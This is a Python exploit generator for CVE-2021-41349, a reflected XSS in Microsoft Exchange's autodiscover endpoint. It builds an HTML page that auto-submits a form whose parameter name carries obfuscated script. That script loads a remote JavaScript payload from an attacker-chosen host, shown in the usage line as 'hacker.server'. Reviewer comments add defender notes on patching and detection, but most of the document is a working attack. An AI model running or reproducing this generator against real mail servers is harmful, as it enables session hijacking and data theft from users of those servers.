CVE-2021-41349.py
#!/usr/bin/python3
import os
import sys
# ASCII-art banner with the author credit. Nothing in the visible script
# prints or otherwise reads `art`.
# NOTE(review): this is not a raw string, so the backslashes in the artwork
# are treated as escape sequences: unrecognised ones are kept literally but
# newer Python versions warn about them, and a backslash directly before a
# line break joins the two lines.
art='''
__ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) /| __ |__| /| _) |__| (__\
\__ \/ |__ /__ \__/ /__ | | | __) | __/
By: exploitio
'''
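# Command-line handling: three positional arguments are required
# (mail server base URL, URL of the external script, output HTML path).
if len(sys.argv) < 4:
    print('Usage:\npython3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html')
    print('Or:\n./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html')
    # sys.exit() instead of the bare exit(): the latter is a convenience
    # injected by the `site` module for interactive sessions and is not
    # guaranteed to exist (e.g. when Python is started with -S).
    sys.exit(1)

# The values are read from the END of argv, so any extra leading arguments
# are silently ignored.
# NOTE(review): none of the three values is validated here; `target` is later
# substituted verbatim into the generated page and `out_file` is used as a
# filesystem path as given.
target, js_payload_url, out_file = sys.argv[-3:]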
def text_to_ascii_str(text):
    """Return the code points of *text* as a comma-separated decimal string.

    Each character is converted with ord(), so despite the function name the
    values are Unicode code points and are not limited to the ASCII range.
    The result is the argument-list form that JavaScript's
    String.fromCharCode() accepts, which is how the HTML template in this
    file consumes it.

    Returns None (not an empty string) when *text* yields no characters.

    Review note for defenders: a URL encoded this way does not appear
    literally in the generated page, so signatures for this pattern should
    key on the String.fromCharCode(...) construct rather than on a URL string.
    """
    code_points = list(map(ord, text))
    if not code_points:
        return None
    return ','.join(map(str, code_points))
# HTML_PAYLOAD is the page that gets written to out_file: the template below
# with two placeholders filled in by the chained str.replace() calls at the
# end of the literal.
#   !!!TARGET!!!  -> `target`, inserted verbatim as the prefix of the form
#                    action.
#   !!!SCR_URL!!! -> `js_payload_url` as comma-separated code points, which
#                    the page turns back into a string with
#                    String.fromCharCode().
#
# What the page does when opened in a browser: after a 3 second timer it
# builds a form and POSTs it (application/x-www-form-urlencoded) to
# <target>/autodiscover/autodiscover.json. The first field's *name* carries
# script markup; the fixed character codes in it spell "body", "script" and
# "src", i.e. the markup appends a <script> element whose src is the encoded
# URL. Presumably the endpoint reflects the parameter name into its response
# without output encoding (reflected XSS; CVE-2021-41349 per the page title,
# a Microsoft Exchange Server issue).
#
# NOTE(review): if text_to_ascii_str() returns None (empty URL argument) the
# second replace() raises TypeError.
#
# Defender notes:
#   - Mitigation: install the vendor security update that addresses
#     CVE-2021-41349 on the affected mail servers.
#   - Detection: look for POST requests to /autodiscover/autodiscover.json
#     whose urlencoded body contains parameter NAMES with "<script" or
#     "String.fromCharCode"; because the form is submitted from a third-party
#     page, the Origin/Referer will usually not be the mail host itself.
HTML_PAYLOAD = '''
<html>
<head>
<title>XSS | CVE-2021-41349</title>
</head>
<body>
<div>
<h1>XSS | CVE-2021-41349</h1>
<p>You'll be redirected after <strong>3 Seconds</strong>, Please Wait ....</p>
</div>
<script>
function submit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "!!!TARGET!!!/autodiscover/autodiscover.json";
form.enctype = "application/x-www-form-urlencoded"
var el = document.createElement("input");
el.name= "<script>document.getElementsByTagName(String.fromCharCode(98,111,100,121))[0].appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).setAttribute(String.fromCharCode(115,114,99),String.fromCharCode(!!!SCR_URL!!!));a";
el.value= '"<\/script>';
form.appendChild(el);
var el = document.createElement("input");
el.name= "x"
el.value= "1";
form.appendChild(el);
document.body.appendChild(form);
form.submit();
}
// Pause 3 secs, Then Run
setTimeout(submit, 3000)
</script>
</body>
</html>
'''.replace('!!!TARGET!!!', target).replace('!!!SCR_URL!!!', text_to_ascii_str(js_payload_url))
# Write the generated page to disk. An existing entry at out_file is unlinked
# first, so the page goes into a newly created file instead of overwriting
# the old file's contents in place.
# NOTE(review): the exists()/remove() pair followed by open() is not atomic;
# the path can change between the check and the write.
already_there = os.path.exists(out_file)
if already_there:
    os.remove(out_file)

with open(out_file, 'w+') as out_handle:
    out_handle.write(HTML_PAYLOAD)